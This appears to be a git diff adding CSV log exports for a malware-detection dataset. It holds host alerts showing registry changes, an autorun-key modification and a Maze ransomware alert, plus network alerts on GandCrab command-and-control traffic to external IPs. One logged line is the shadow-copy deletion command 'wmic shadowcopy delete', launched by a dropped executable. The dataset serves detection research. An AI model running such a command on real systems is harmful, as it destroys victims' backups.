14:24:49.117",3,"Windows Logon Success", +"Apr 6, 2020 @ 14:24:48.944",3,"The database engine attached a database", +"Apr 6, 2020 @ 14:24:48.827",9,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from 'not applicable' to failed", +"Apr 6, 2020 @ 14:24:48.780",3,"The database engine is starting a new instance", +"Apr 6, 2020 @ 14:24:42.403",5,"SessionEnv was unavailable to handle a notification event", +"Apr 6, 2020 @ 14:24:41.958",3,"Windows Workstation Logon Success", +"Apr 6, 2020 @ 14:24:41.928",3,"Windows Workstation Logon Success", +"Apr 6, 2020 @ 14:24:40.942",7,"SessionEnv was unavailable to handle a critical notification event", +"Apr 6, 2020 @ 14:24:40.586",3,"Windows Logon Success", +"Apr 6, 2020 @ 14:24:39.892",3,"Ossec agent started.","ossec: Agent started: 'windows-10->any'." +"Apr 6, 2020 @ 14:24:10.557",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer' checksum changed. +Old md5sum was: '497a8c7081c737f07c267a30b1538ff9' +New md5sum is : 'd41d8cd98f00b204e9800998ecf8427e' +Old sha1sum was: '58d9cdbd07af978efc5e91b8e7a66696280d3b1e' +New sha1sum is : 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +" +"Apr 6, 2020 @ 14:24:10.541",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\ActiveX Compatibility' checksum changed. +Old md5sum was: '44a185f2e5e0fa09edbcbe3e598fe4da' +New md5sum is : 'd41d8cd98f00b204e9800998ecf8427e' +Old sha1sum was: 'f7a3cf6aa04ebaeee3c4525064299cb2136e4f06' +New sha1sum is : 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +" +"Apr 6, 2020 @ 14:24:07.945",5,"SessionEnv was unavailable to handle a notification event", +"Apr 6, 2020 @ 14:24:07.932",5,"WSearch was unavailable to handle a notification event", +"Apr 6, 2020 @ 14:22:27.224",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits' checksum changed. +Old md5sum was: 'f65ebed619edcfc8fafe21f958215b53' +New md5sum is : 'd8c503783bde9bba94c7b5e9b6f56d5e' +Old sha1sum was: '493297f96d762981a98fbe5f8c5b5782c30b65aa' +New sha1sum is : 'cd5545ba37f52a71c7212842358b2c7891cc67c1' +" +"Apr 6, 2020 @ 14:22:27.177",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime' checksum changed. +Old md5sum was: '619d435b1dac461a9b0cfd3b48ee8f37' +New md5sum is : '3bed6b4b8101da842bb6afe04a8271c2' +Old sha1sum was: '95d0826303f42e23fada9a211bd9ea71de2d5c51' +New sha1sum is : '6bcfa900864cb27898f9c3bf26b53fb3b0eb9d2c' +" +"Apr 6, 2020 @ 14:22:14.990",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\AppIso\FirewallRules' checksum changed. +Old md5sum was: 'e7b15bf68d8864eba94868ebca21f3a9' +New md5sum is : '0231145ca99a840395c3772f19d7bf2e' +Old sha1sum was: '89d53aab4bb2b7f60e8bc004c8644a2d57b627e1' +New sha1sum is : '8bb61b82ef06aca0226aabaabd5850edec858d9a' +" +"Apr 6, 2020 @ 14:22:13.932",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules' checksum changed. +Old md5sum was: '943a3530927d924772ada9a68caa61d2' +New md5sum is : 'b0d74b8b9da27bf097def0edef51976a' +Old sha1sum was: '129e0b2682884d08dd905e554c2c1d027314e17b' +New sha1sum is : '85c2962a659d70880b1f863906002042ff403691' +" +"Apr 6, 2020 @ 14:22:13.879",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch' checksum changed. +Old md5sum was: '0a11a072fc5a95522aa8ca6087115073' +New md5sum is : '728627011eedd28411cf4e1f2a30d1ca' +Old sha1sum was: '7afc9a8039fc019833a674d4b24d2aac0c3bec0f' +New sha1sum is : '26576187b3bbee39309e7ebe95de85749ea7b9d2' +" +"Apr 6, 2020 @ 14:21:28.750",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: 'c07851f8f2e30eb65757347b948170ba' +New md5sum is : '6a5ba5db7a5af421f75d94743743fe75' +Old sha1sum was: '8b3f116aaee6cbd1dd5d8bf234c4f02b0a5c3e60' +New sha1sum is : '31ff396526e9de372a9c73b66b754121a6110de5' +" +"Apr 6, 2020 @ 14:21:07.309",3,"Software Protection service scheduled successfully", +"Apr 6, 2020 @ 14:20:59.148",3,"Windows Logon Success", +"Apr 6, 2020 @ 14:20:12.286",3,"Software Protection service scheduled successfully", +"Apr 6, 2020 @ 14:19:37.770",3,"Windows Logon Success", +"Apr 6, 2020 @ 14:19:03.962",8,"Windows Audit Policy changed", +"Apr 6, 2020 @ 14:19:03.947",8,"Windows Audit Policy changed", diff --git a/data/MW_22_HIDS_3.csv b/data/MW_22_HIDS_3.csv new file mode 100644 index 0000000..d1c1284 --- /dev/null +++ b/data/MW_22_HIDS_3.csv @@ -0,0 +1,139 @@ +timestamp,"rule.level","rule.description","data.win.system.message","data.win.eventdata.commandLine","full_log" +"May 24, 2020 @ 13:50:23.958",9,"Windows Application error event","""Faulting application name: winlogon.exe, version: 10.0.18362.693, time stamp: 0xeda872dc +Faulting module name: msvcrt.dll, version: 7.0.18362.1, time stamp: 0xf5bdefd7 +Exception code: 0x40000015 +Fault offset: 0x000000000000ae72 +Faulting process id: 0x16d8 +Faulting application start time: 0x01d631d221e1f41b +Faulting application path: C:\Windows\system32\winlogon.exe +Faulting module path: C:\Windows\System32\msvcrt.dll +Report Id: 75c957a2-0936-4aed-a78b-572b2d700cda +Faulting package full name: +Faulting package-relative application ID: """,, +"May 24, 2020 @ 13:50:01.662",7,"Integrity checksum changed.",,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed. +Old md5sum was: '496e80acc19637c8daf8c286b6ea10f0' +New md5sum is : '01fd3d623cd1212dc2db7fb53f3f8706' +Old sha1sum was: '88ef9e17f6f18f6242bf8a46b383b017d42012b9' +New sha1sum is : '039037543a932327e95cb73b56beadf230ce75a6' +" +"May 24, 2020 @ 13:50:01.646",7,"Integrity checksum changed.",,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '89598d32459256342f73e9b832b618dc' +New md5sum is : '4a4201336efd4dab88e86fa22c476f9b' +Old sha1sum was: '68aacf23a86d664018607a7fc5d1379269af8643' +New sha1sum is : '1cde5b8e975fa3bcd4307ab51c1b43564ca9d656' +" +"May 24, 2020 @ 13:50:00.271",7,"Integrity checksum changed.",,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows' checksum changed. +Old md5sum was: '49574a9da5b73510ecb8125c7786d037' +New md5sum is : 'a94ecbd5eaeee72bd7ceca1faad96e30' +Old sha1sum was: 'fc3c9a4be6b806a974693af1dc528845db7631da' +New sha1sum is : '269518a35686493cde84837b1668ea322e4d3d13' +" +"May 24, 2020 @ 13:49:59.191",7,"Integrity checksum changed.",,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer' checksum changed. +Old md5sum was: 'd41d8cd98f00b204e9800998ecf8427e' +New md5sum is : '497a8c7081c737f07c267a30b1538ff9' +Old sha1sum was: 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +New sha1sum is : '58d9cdbd07af978efc5e91b8e7a66696280d3b1e' +" +"May 24, 2020 @ 13:49:44.489",7,"Integrity checksum changed.",,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\ActiveX Compatibility' checksum changed. +Old md5sum was: 'd41d8cd98f00b204e9800998ecf8427e' +New md5sum is : '44a185f2e5e0fa09edbcbe3e598fe4da' +Old sha1sum was: 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +New sha1sum is : 'f7a3cf6aa04ebaeee3c4525064299cb2136e4f06' +" +"May 24, 2020 @ 13:49:16.254",9,"Windows Application error event","""Faulting application name: winlogon.exe, version: 10.0.18362.693, time stamp: 0xeda872dc +Faulting module name: msvcrt.dll, version: 7.0.18362.1, time stamp: 0xf5bdefd7 +Exception code: 0x40000015 +Fault offset: 0x000000000000ae72 +Faulting process id: 0x244 +Faulting application start time: 0x01d631d1f7428bc3 +Faulting application path: C:\Windows\system32\winlogon.exe +Faulting module path: C:\Windows\System32\msvcrt.dll +Report Id: 70880634-b5f9-40da-bf1c-68260a77c44d +Faulting package full name: +Faulting package-relative application ID: """,, +"May 24, 2020 @ 13:48:51.909",7,"Integrity checksum changed.",,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender' checksum changed. +Old md5sum was: '59cb747b331c527a030961483156cea0' +New md5sum is : 'bd77bf299c0366a5a3013dd7209f2afa' +Old sha1sum was: '797f0246bbcb2020cc30cde64c69b48810b0e47e' +New sha1sum is : '064e1756881953a404b3daf932947bef82ccadd4' +" +"May 24, 2020 @ 13:48:51.259",7,"Integrity checksum changed.",,,"File 'HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender' checksum changed. +Old md5sum was: '59cb747b331c527a030961483156cea0' +New md5sum is : 'bd77bf299c0366a5a3013dd7209f2afa' +Old sha1sum was: '797f0246bbcb2020cc30cde64c69b48810b0e47e' +New sha1sum is : '064e1756881953a404b3daf932947bef82ccadd4' +" +"May 24, 2020 @ 13:48:31.577",9,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from 'not applicable' to failed",,, +"May 24, 2020 @ 13:48:25.151",10,"ATT&CK T1060: Autorun Keys Modification","""Registry value set: +RuleName: T1060 +EventType: SetValue +UtcTime: 2020-05-24 13:48:11.808 +ProcessGuid: {df9fc3d3-7b18-5eca-0000-0010cb910000} +ProcessId: 328 +Image: C:\Windows\System32\smss.exe +TargetObject: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\LoadAppInit_DLLs +Details: DWORD (0x00000001)""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T13:48:21.301287700Z"",""eventRecordID"":""1391"",""processID"":""2296"",""threadID"":""3676"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 13:48:11.808\r\nProcessGuid: {df9fc3d3-7b18-5eca-0000-0010cb910000}\r\nProcessId: 328\r\nImage: C:\\Windows\\System32\\smss.exe\r\nTargetObject: HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\LoadAppInit_DLLs\r\nDetails: DWORD (0x00000001)\""""},""eventdata"":{""ruleName"":""T1060"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 13:48:11.808"",""processGuid"":""{df9fc3d3-7b18-5eca-0000-0010cb910000}"",""processId"":""328"",""image"":""C:\\\\Windows\\\\System32\\\\smss.exe"",""targetObject"":""HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\LoadAppInit_DLLs"",""details"":""DWORD (0x00000001)""}}}" +"May 24, 2020 @ 13:48:22.803",7,"SessionEnv was unavailable to handle a critical notification event","""The winlogon notification subscriber was unavailable to handle a critical notification event.""",, +"May 24, 2020 @ 13:47:44.586",7,"Integrity checksum changed.",,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer' checksum changed. +Old md5sum was: '497a8c7081c737f07c267a30b1538ff9' +New md5sum is : 'd41d8cd98f00b204e9800998ecf8427e' +Old sha1sum was: '58d9cdbd07af978efc5e91b8e7a66696280d3b1e' +New sha1sum is : 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +" +"May 24, 2020 @ 13:47:44.569",7,"Integrity checksum changed.",,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\ActiveX Compatibility' checksum changed. +Old md5sum was: '44a185f2e5e0fa09edbcbe3e598fe4da' +New md5sum is : 'd41d8cd98f00b204e9800998ecf8427e' +Old sha1sum was: 'f7a3cf6aa04ebaeee3c4525064299cb2136e4f06' +New sha1sum is : 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +" +"May 24, 2020 @ 13:45:14.590",10,"Multiple Windows error events","""Id = {00000000-0000-0000-0000-000000000000}; ClientMachine = DESKTOP-HUE026H; User = NT AUTHORITY\SYSTEM; ClientProcessId = 6324; Component = Unknown; Operation = Start IWbemServices::ExecQuery - ROOT\WMI : SELECT * FROM BatteryStaticData; ResultCode = 0x80041010; PossibleCause = Unknown""",, +"May 24, 2020 @ 13:44:35.588",7,"Integrity checksum changed.",,,"File 'HKEY_LOCAL_MACHINE\Security\Policy\PolAdtEv' checksum changed. +Old md5sum was: '9d15aff4d26f802c3c4d3d74a00d8d4d' +New md5sum is : 'b40de87500ee3eed90c2ce3ce8c7946f' +Old sha1sum was: '11f3afa3902d0fadfcc52e4c051995f536c7d4e2' +New sha1sum is : '2f6e6dd0efd148b1c11d33c91e9cea4a97a84792' +" +"May 24, 2020 @ 13:43:18.250",8,"Windows Audit Policy changed","""System audit policy was changed. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Audit Policy Change: + Category: Object Access + Subcategory: Handle Manipulation + Subcategory GUID: {0cce9223-69ae-11d9-bed3-505054503030} + Changes: Success Added""",, +"May 24, 2020 @ 13:43:18.200",8,"Windows Audit Policy changed","""System audit policy was changed. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Audit Policy Change: + Category: Object Access + Subcategory: File System + Subcategory GUID: {0cce921d-69ae-11d9-bed3-505054503030} + Changes: Success Added""",, +"May 24, 2020 @ 13:43:09.418",7,"Integrity checksum changed.",,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}' checksum changed. +Old md5sum was: '7fa7290c3b0e7b2d8ed5a092299db356' +New md5sum is : '271f59daf9ca28fbeb0bd234897e1662' +Old sha1sum was: '27735fff26a4f9093576dfbd77d06599094d3497' +New sha1sum is : 'e8d6ecabf76ed97cd87dc8593f64cd69ec8ec7a2' +" +"May 24, 2020 @ 13:43:08.402",7,"Integrity checksum changed.",,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed. +Old md5sum was: '8535e71303cbabe6816cd4f197652bc8' +New md5sum is : '496e80acc19637c8daf8c286b6ea10f0' +Old sha1sum was: '46940de4369c12b1d1c24136f4fe3108925e9678' +New sha1sum is : '88ef9e17f6f18f6242bf8a46b383b017d42012b9' +" +"May 24, 2020 @ 13:43:08.386",7,"Integrity checksum changed.",,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: 'be8a4b502546da3087f02371f0f02c17' +New md5sum is : '89598d32459256342f73e9b832b618dc' +Old sha1sum was: 'bd49702c05c290aaa23685f3c33157cdf7b4ee52' +New sha1sum is : '68aacf23a86d664018607a7fc5d1379269af8643' +" diff --git a/data/MW_22_NIDS.csv b/data/MW_22_NIDS.csv new file mode 100644 index 0000000..03c3de0 --- /dev/null +++ b/data/MW_22_NIDS.csv @@ -0,0 +1 @@ +"@timestamp",message,"log.file.path" diff --git a/data/MW_23_HIDS_3.csv b/data/MW_23_HIDS_3.csv new file mode 100644 index 0000000..594943a --- /dev/null +++ b/data/MW_23_HIDS_3.csv @@ -0,0 +1,81 @@ +timestamp,"rule.level","rule.description","data.win.system.message","data.win.eventdata.commandLine","data.win.eventdata.targetObject","full_log","data.win.eventdata.details" +"May 29, 2020 @ 12:36:09.900",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}' checksum changed. +Old md5sum was: '7fa7290c3b0e7b2d8ed5a092299db356' +New md5sum is : '7b0e21ee99623454e8d06871f064ed98' +Old sha1sum was: '27735fff26a4f9093576dfbd77d06599094d3497' +New sha1sum is : 'f63735bbc2e72216030f4e994b7c9785856a9170' +", +"May 29, 2020 @ 12:33:43.257",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}' checksum changed. +Old md5sum was: '7b0e21ee99623454e8d06871f064ed98' +New md5sum is : '7fa7290c3b0e7b2d8ed5a092299db356' +Old sha1sum was: 'f63735bbc2e72216030f4e994b7c9785856a9170' +New sha1sum is : '27735fff26a4f9093576dfbd77d06599094d3497' +", +"May 29, 2020 @ 12:33:42.148",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed. +Old md5sum was: 'effa08da348bc457b14fdae2511923be' +New md5sum is : '2cf3ce4970fb25f9237c226b8de91a23' +Old sha1sum was: '0e5b3fad93a467a9f52ed5c88f5f2975b03c4f79' +New sha1sum is : '8f5edce88e798c3b3085f743cc79f804540ea6ae' +", +"May 29, 2020 @ 12:33:42.132",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '100f9ce3de480fe478e2a23a5dd9b2b0' +New md5sum is : '758365bbcd458b2a523c7ab4132c04af' +Old sha1sum was: '2d38ff662d86bec02f7b2458b2d25c471e39ee66' +New sha1sum is : '691b9f4c6de22a25538af85b815563825e93ed4f' +", +"May 29, 2020 @ 12:33:37.788",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer' checksum changed. +Old md5sum was: 'd41d8cd98f00b204e9800998ecf8427e' +New md5sum is : '497a8c7081c737f07c267a30b1538ff9' +Old sha1sum was: 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +New sha1sum is : '58d9cdbd07af978efc5e91b8e7a66696280d3b1e' +", +"May 29, 2020 @ 12:33:35.539",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_USE_WINDOWEDSELECTCONTROL' checksum changed. +Old md5sum was: '370914f65a755a1cbfcf0c873b11feaa' +New md5sum is : '1c729912f87f9abbd1574176fc5996f7' +Old sha1sum was: 'ea4c2f8e1a1dc5de73a98dbadb5abff9297c9a4b' +New sha1sum is : '1d2094dc263dc3db258f4421536e179cfbd9cfb0' +", +"May 29, 2020 @ 12:33:25.944",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\ActiveX Compatibility' checksum changed. +Old md5sum was: 'd41d8cd98f00b204e9800998ecf8427e' +New md5sum is : '44a185f2e5e0fa09edbcbe3e598fe4da' +Old sha1sum was: 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +New sha1sum is : 'f7a3cf6aa04ebaeee3c4525064299cb2136e4f06' +", +"May 29, 2020 @ 12:32:12.827",9,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from 'not applicable' to failed",,,,, +"May 29, 2020 @ 12:32:03.697",7,"SessionEnv was unavailable to handle a critical notification event","""The winlogon notification subscriber was unavailable to handle a critical notification event.""",,,, +"May 29, 2020 @ 12:31:21.935",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer' checksum changed. +Old md5sum was: '497a8c7081c737f07c267a30b1538ff9' +New md5sum is : 'd41d8cd98f00b204e9800998ecf8427e' +Old sha1sum was: '58d9cdbd07af978efc5e91b8e7a66696280d3b1e' +New sha1sum is : 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +", +"May 29, 2020 @ 12:31:21.918",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\ActiveX Compatibility' checksum changed. +Old md5sum was: '44a185f2e5e0fa09edbcbe3e598fe4da' +New md5sum is : 'd41d8cd98f00b204e9800998ecf8427e' +Old sha1sum was: 'f7a3cf6aa04ebaeee3c4525064299cb2136e4f06' +New sha1sum is : 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +", +"May 29, 2020 @ 12:29:42.808",10,"Multiple Windows error events","""Id = {00000000-0000-0000-0000-000000000000}; ClientMachine = DESKTOP-HUE026H; User = DESKTOP-HUE026H\John Williams; ClientProcessId = 3352; Component = Unknown; Operation = Start IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory WHERE Tag='Physical Memory 0'; ResultCode = 0x80041032; PossibleCause = Unknown""",,,, +"May 29, 2020 @ 12:29:22.611",15,"ATT&CK T1204: Maze Ransomware","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:15.487 +ProcessGuid: {df9fc3d3-b387-5ecf-0000-0010452c2100} +ProcessId: 3848 +Image: C:\Windows\SysWOW64\wbem\WMIC.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: WMI Commandline Utility +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: wmic.exe +CommandLine: ""C:\Windows\system32\wbem\wmic.exe"" shadowcopy delete +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=F86F3CA37E51F7A6BD352C3A0471ED1E,SHA256=A6ACB58967159648C84D67B06DC6511A9A831386742B4F1F96B0A19AFC8B8037,IMPHASH=C5BFFECCAB78B6F4FD77B28F6F297D84 +ParentProcessGuid: {df9fc3d3-b34b-5ecf-0000-00105d221600} +ParentProcessId: 4872 +ParentImage: C:\Users\John Williams\AppData\Local\Temp\gft.exe +ParentCommandLine: ""C:\Users\John Williams\AppData\Local\Temp\gft.exe"" ""","\""C:\\Windows\\system32\\wbem\\wmic.exe\"" shadowcopy delete",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:15.498253700Z"",""eventRecordID"":""2079"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:15.487\r\nProcessGuid: {df9fc3d3-b387-5ecf-0000-0010452c2100}\r\nProcessId: 3848\r\nImage: C:\\Windows\\SysWOW64\\wbem\\WMIC.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: WMI Commandline Utility\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: wmic.exe\r\nCommandLine: \""C:\\Windows\\system32\\wbem\\wmic.exe\"" shadowcopy delete\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=F86F3CA37E51F7A6BD352C3A0471ED1E,SHA256=A6ACB58967159648C84D67B06DC6511A9A831386742B4F1F96B0A19AFC8B8037,IMPHASH=C5BFFECCAB78B6F4FD77B28F6F297D84\r\nParentProcessGuid: {df9fc3d3-b34b-5ecf-0000-00105d221600}\r\nParentProcessId: 4872\r\nParentImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\gft.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\gft.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:15.487"",""processGuid"":""{df9fc3d3-b387-5ecf-0000-0010452c2100}"",""processId"":""3848"",""image"":""C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WMIC.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""WMI Commandline Utility"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""wmic.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\wbem\\\\wmic.exe\\\"" shadowcopy delete"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=F86F3CA37E51F7A6BD352C3A0471ED1E,SHA256=A6ACB58967159648C84D67B06DC6511A9A831386742B4F1F96B0A19AFC8B8037,IMPHASH=C5BFFECCAB78B6F4FD77B28F6F297D84"",""parentProcessGuid"":""{df9fc3d3-b34b-5ecf-0000-00105d221600}"",""parentProcessId"":""4872"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\gft.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\gft.exe\\\""""}}}", diff --git a/data/MW_23_NIDS.csv b/data/MW_23_NIDS.csv new file mode 100644 index 0000000..d5d1ab1 --- /dev/null +++ b/data/MW_23_NIDS.csv @@ -0,0 +1,22 @@ +"@timestamp",message,"log.file.path" +"May 29, 2020 @ 12:31:12.277","05/29-12:31:09.496897 [**] [1:2010066:13] ET POLICY Data POST to an image file (gif) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50188 -> 171.244.34.167:80","/var/log/snort/alert.fast" +"May 29, 2020 @ 12:31:12.277","05/29/2020-12:31:09.987333 [**] [1:2010066:16] ET POLICY Data POST to an image file (gif) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50188 -> 171.244.34.167:80","/var/log/suricata/fast.log" +"May 29, 2020 @ 12:31:12.277","05/29/2020-12:31:11.317035 [**] [1:2010066:16] ET POLICY Data POST to an image file (gif) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50192 -> 217.174.149.130:80","/var/log/suricata/fast.log" +"May 29, 2020 @ 12:31:12.277","05/29/2020-12:31:11.317035 [**] [1:2025638:3] ET MALWARE [eSentire] Win32/GandCrab v4/5 Ransomware CnC Activity [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:50192 -> 217.174.149.130:80","/var/log/suricata/fast.log" +"May 29, 2020 @ 12:31:12.277","05/29-12:31:11.042803 [**] [1:2010066:13] ET POLICY Data POST to an image file (gif) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50192 -> 217.174.149.130:80","/var/log/snort/alert.fast" +"May 29, 2020 @ 12:30:37.245","05/29/2020-12:30:35.794580 [**] [1:2010067:10] ET POLICY Data POST to an image file (jpg) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50159 -> 186.202.157.79:80","/var/log/suricata/fast.log" +"May 29, 2020 @ 12:30:37.245","05/29-12:30:30.852033 [**] [1:2010067:9] ET POLICY Data POST to an image file (jpg) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50155 -> 45.118.145.96:80","/var/log/snort/alert.fast" +"May 29, 2020 @ 12:30:37.245","05/29-12:30:35.600448 [**] [1:2010067:9] ET POLICY Data POST to an image file (jpg) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50159 -> 186.202.157.79:80","/var/log/snort/alert.fast" +"May 29, 2020 @ 12:30:37.244","05/29/2020-12:30:31.659499 [**] [1:2010067:10] ET POLICY Data POST to an image file (jpg) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50155 -> 45.118.145.96:80","/var/log/suricata/fast.log" +"May 29, 2020 @ 12:30:22.234","05/29-12:30:20.465657 [**] [1:2010067:9] ET POLICY Data POST to an image file (jpg) [**] [Classification: A Network Trojan was detected] 